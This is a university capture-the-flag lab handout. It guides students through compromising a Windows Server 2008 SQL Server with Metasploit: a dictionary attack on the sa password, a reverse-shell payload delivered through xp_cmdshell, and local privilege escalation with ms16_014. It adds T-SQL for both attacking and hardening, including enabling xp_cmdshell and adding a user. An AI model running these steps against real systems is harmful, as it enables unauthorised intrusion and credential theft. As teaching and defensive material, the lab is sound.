Project-3: Privilege Escalation-2
In this project, you are assigned to gain privileged access to a Windows Server 2008 machine in a CTF (Capture-the-Flag) event. You will discover that the Windows 2008 host runs a vulnerable MS SQL service. First, you will exploit that service with the Metasploit Framework to gain an unprivileged shell. Then you will use Metasploit's "exploit suggester" module to find a local privilege-escalation exploit and try to gain a privileged shell. You should get a privileged shell on your first try.
Reminder
Please skim the specified chapters of the book (Metasploit 5.0 for Beginners, 2nd ed.) before starting this project.
Computers
Notes:
1) You will perform all of your actions from Kali Linux.
2) You cannot copy and paste between your own computer and the computers in the Netlab environment. Typing is quicker and more reliable if you press the Tab key after the first 2-3 letters of each Metasploit command or parameter so that it is auto-completed.
3) Use Ctrl and - (minus) to shrink the font in the Kali Linux terminal window; alternatively, click View on the menu bar and then Shrink Font.
4) If you get an error like "Meterpreter session # closed. Reason: Died", terminate your reservation and restart the lab unless otherwise specified. In this lab the cause of this error is a session timeout. In the second reservation, go through the steps more quickly.
Steps of Hacking
1) Scan the network to check for MS SQL service
2) Crack the sa password
3) Get a shell
4) Confirm that the shell is low-privileged
5) Get a high-privileged shell
6) Confirm that the shell is high-privileged
7) Give rise to an information security breach
The List of Actions/Commands per Step
1. Scan the network to check for MS SQL service
In this part, scan all computers in the network for the MS SQL Server service (port 1433/tcp). Use the service detection option you used last week.
Run Nmap with these options and take screenshot(s) of the result showing that the port is open on Windows 2008.
Type the command here
2. Crack the sa password
sa is the most privileged account on a SQL Server instance: it is a member of the sysadmin server role. For that reason it is a routine target for attackers, and it will be yours in this part. You will use Metasploit to crack the password of the sa account with a dictionary attack.
Command Notes
gunzip /usr/share/wordlists/rockyou.txt.gz Decompress the password dictionary
msfconsole Open Metasploit
search mssql_login Find a relevant Metasploit module
Type the command here Type in the required command (load the module you found).
show options See the list of available options. Confirm that the USERNAME option has already been set to "sa". You still need to set some other options.
Type the command here Set the remote host (the SQL Server) to connect to; the module will then try the passwords from the wordlist against it remotely.
Type the command here Check the username; if you see root, change it to the correct one (sa).
set pass_file /usr/share/wordlists/rockyou.txt This is the password list (dictionary) you decompressed. The module tries each entry as the sa password.
set verbose false Type in this command if you don't want to see a message for every failed login attempt.
run Take a screenshot of the terminal window showing the password of the sa account. Note: write down this password; you will use it later on. This command takes about 80 seconds to complete.
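The defender's view of this step, as an added example that is not part of the lab handout: the T-SQL a DBA on the Windows 2008 target would run to see the mssql_login dictionary attack in the SQL Server error log and to take sa out of reach. It assumes a sysadmin connection to the instance, SQL Server 2005 or later, and the default login auditing setting (failed logins are written to the error log). The replacement login name and the password literal are placeholders, not values from the lab.

```sql
-- Added example, not part of the lab handout.
-- Run as a sysadmin login on the targeted SQL Server instance.

-- 1. Spot the dictionary attack. Every guess that mssql_login sends ends up
--    in the SQL Server error log as a failed login, together with the client
--    address of the Kali box ("[CLIENT: x.x.x.x]").
--    xp_readerrorlog is undocumented but present in every supported version.
--    Arguments: log file number (0 = current), log type (1 = SQL Server log),
--    first search string, second search string (both must match the line).
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed for user ''sa''', N'CLIENT:';

-- 2. Check how exposed sa is. is_policy_checked = 0 means the Windows password
--    policy (complexity and lockout threshold) is not applied to this SQL login,
--    so rockyou.txt can be run through it without the account ever locking.
SELECT name, is_disabled, is_policy_checked, is_expiration_checked
FROM sys.sql_logins
WHERE name = N'sa';

-- 3. Harden. Give sa a long random password with policy enforcement, rename it
--    so the default target name used by the module no longer exists, and disable
--    it. Day-to-day administration uses a separate named sysadmin login instead.
--    (The password below is a placeholder; generate the real one from a vault.)
ALTER LOGIN sa WITH PASSWORD = N'placeholder-replace-with-vault-generated-secret', CHECK_POLICY = ON;
ALTER LOGIN sa WITH NAME = [svc_dba_legacy];
ALTER LOGIN [svc_dba_legacy] DISABLE;

-- 4. Verify: no row named 'sa' should come back, and the renamed login must
--    show is_disabled = 1.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE name IN (N'sa', N'svc_dba_legacy');
```

Reading the output of step 1 is how the "what might have prevented these attacks" part of the reflection can be grounded: the log shows the attacking IP and a failure rate of tens of logins per second, which a lockout policy (step 3) or a firewall rule limiting 1433/tcp to the application servers would have stopped before rockyou.txt got anywhere near the real password.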
3. Get a shell
In this part, you will get a shell on Windows 2008 through the xp_cmdshell procedure of MS SQL Server. xp_cmdshell is a dangerous extended stored procedure that lets the database engine run operating-system commands. Anything it runs executes under the account the SQL Server service runs as, so it can copy files, create folders and much more. It is disabled by default and can only be enabled by a sysadmin-level login, which is why the cracked sa password is what makes it usable here.
In this part, you will use a Metasploit exploit module that drives xp_cmdshell to deliver a payload and create a shell.
search mssql_payload Search Metasploit for possible MS SQL payloads
use exploit/windows/mssql/mssql_payload This is the Metasploit exploit module that delivers a payload through the xp_cmdshell procedure on MS SQL Server.
show options See the options for this module. By default, the USERNAME option has already been set to "sa".
Type the command here Did you see that the RHOSTS option is blank? Set it to the Windows 2008 server. RPORT is already set to 1433.
Type the command here Set the password of the sa account you cracked in the previous part.
set payload windows/x64/meterpreter/reverse_tcp You have to set the payload, although it is not shown in the options list; it is a module-level option that applies to the mssql_payload exploit. mssql_payload only uses xp_cmdshell to get your code running on the target; the payload is what connects back over the network and carries the session. This is the analog RC car and its remote control from Project-1: the exploit puts the car on the track, the payload is the radio link you drive it with.
Type the command here Assign the local counterpart of the host: the address on Kali that the reverse payload will connect back to.
set lport 443 Assign the local counterpart of the port number: the port on Kali that will listen for that connection.
run or exploit You should get a Meterpreter session after running the exploit.
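What mssql_payload does over the SQL connection, and the matching hardening, as an added T-SQL example that is not part of the lab handout. The first half is the sequence a sysadmin login (sa in this lab) can send to switch xp_cmdshell on and run OS commands, which is the mechanism the module relies on; the second half is what the defender sets and the queries that confirm it held. It assumes SQL Server 2005 or later (the final query needs 2008 R2 SP1 or later); the user name and password in the net user line are made up.

```sql
-- Added example, not part of the lab handout.

-- === What the attacker sends once the sa password is known ===
-- xp_cmdshell is off by default; a sysadmin can switch it on in two steps.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Every command now runs as the SQL Server service account, not as sa.
-- This is the account you will see from whoami in step 4.
EXEC master..xp_cmdshell 'whoami';

-- The same thing step 4 asks you to try from the shell. It succeeds only if
-- the service account is a local administrator; with a low-privileged service
-- account it is refused, which is exactly what the lab expects you to observe.
-- (User name and password are made up for the example.)
EXEC master..xp_cmdshell 'net user labtest Lab-Passw0rd! /add';

-- === What the defender sets ===
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- Verify from sys.configurations: value_in_use must be 0 for xp_cmdshell.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- Verify the service identity, i.e. the account any xp_cmdshell command would
-- run as. A per-service virtual account or a low-privileged domain account
-- keeps the attacker out of the Administrators group even if xp_cmdshell is
-- re-enabled. (sys.dm_server_services: SQL Server 2008 R2 SP1 or later.)
SELECT servicename, service_account
FROM sys.dm_server_services;
```

Turning xp_cmdshell off is not a barrier to a login that already holds sysadmin: the first four statements above re-enable it in seconds. Its value is that the change is visible in the error log and in sys.configurations, and that it raises the bar for lower-privileged logins. The control that actually breaks this lab's attack chain is keeping sysadmin logins out of an attacker's hands (step 2) and running the service under an account that cannot do anything useful with a shell (the last query).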
4. Confirm that the shell is low-privileged
Now try some commands to check the privilege level of the shell.
Commands Notes
shell Switch from Meterpreter to a native Windows 2008 command shell.
whoami See which user the shell runs as. It is probably a low-privileged account (the one the SQL Server service runs as). Let's try something that requires administrative privileges.
Type the command here Try to add a user account from the command line. Take a screenshot of the terminal window showing the result.
exit Exit the Windows 2008 shell and return to the Meterpreter prompt.
5. Get a high-privileged shell
In this part, you will use the exploit suggester module to find local exploits for privilege escalation, and then use one of them.
background Send the Meterpreter session to the background. Don't forget to note the session ID.
search suggester Search for the keyword "suggester" to find the correct name of the suggester module.
Type the command here Type in the correct command (load the module).
show options
Type the command here Write the correct command (point the module at your session).
run or exploit Run the exploit suggester; it lists local exploits that may turn the low-privileged session into a high-privileged one.
Type the command here Use ms16_014_wmi_recv_notif. Type in the correct command (load that exploit module).
show options
set session # Use the same session ID you gave to the exploit suggester. Remember, you are trying one of the exploits suggested by local_exploit_suggester against that session.
run or exploit After running the exploit, you should see the message "Exploit completed, but no session was created." That is expected at this point: the payload's options have not been set yet.
show options This time you will also see the options of the payload (reverse_shell_tcp).
Type the command here Set the first option of the payload.
Type the command here Set the second option of the payload.
run or exploit You should get a shell after running the exploit. This time it is a plain Windows command shell rather than a Meterpreter session. (Press Enter once to get a prompt.)
6. Confirm that the shell is high-privileged
Now check whether you have the privileges to perform dangerous actions.
whoami Take a screenshot of the terminal window showing the username.
7. Give rise to an information security breach
Type the command(s) here Do something that causes a loss of confidentiality, integrity, or availability on the target system. Provide the details and take screenshots. Perform something different from what you did in Project-2 (don't create a user account).
Weekly Learning and Reflection
In two to three paragraphs (i.e., sentences, not bullet lists), using APA-style citations if needed, summarize and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities you exploited, and what might have prevented these attacks. Mention the attacker and all of the targets in your summary. You can provide topologies, sketches, or graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also about what you learned through the session. You can ask questions about the things you are confused about. Questions asked here will be summarized and answered anonymously in the next class.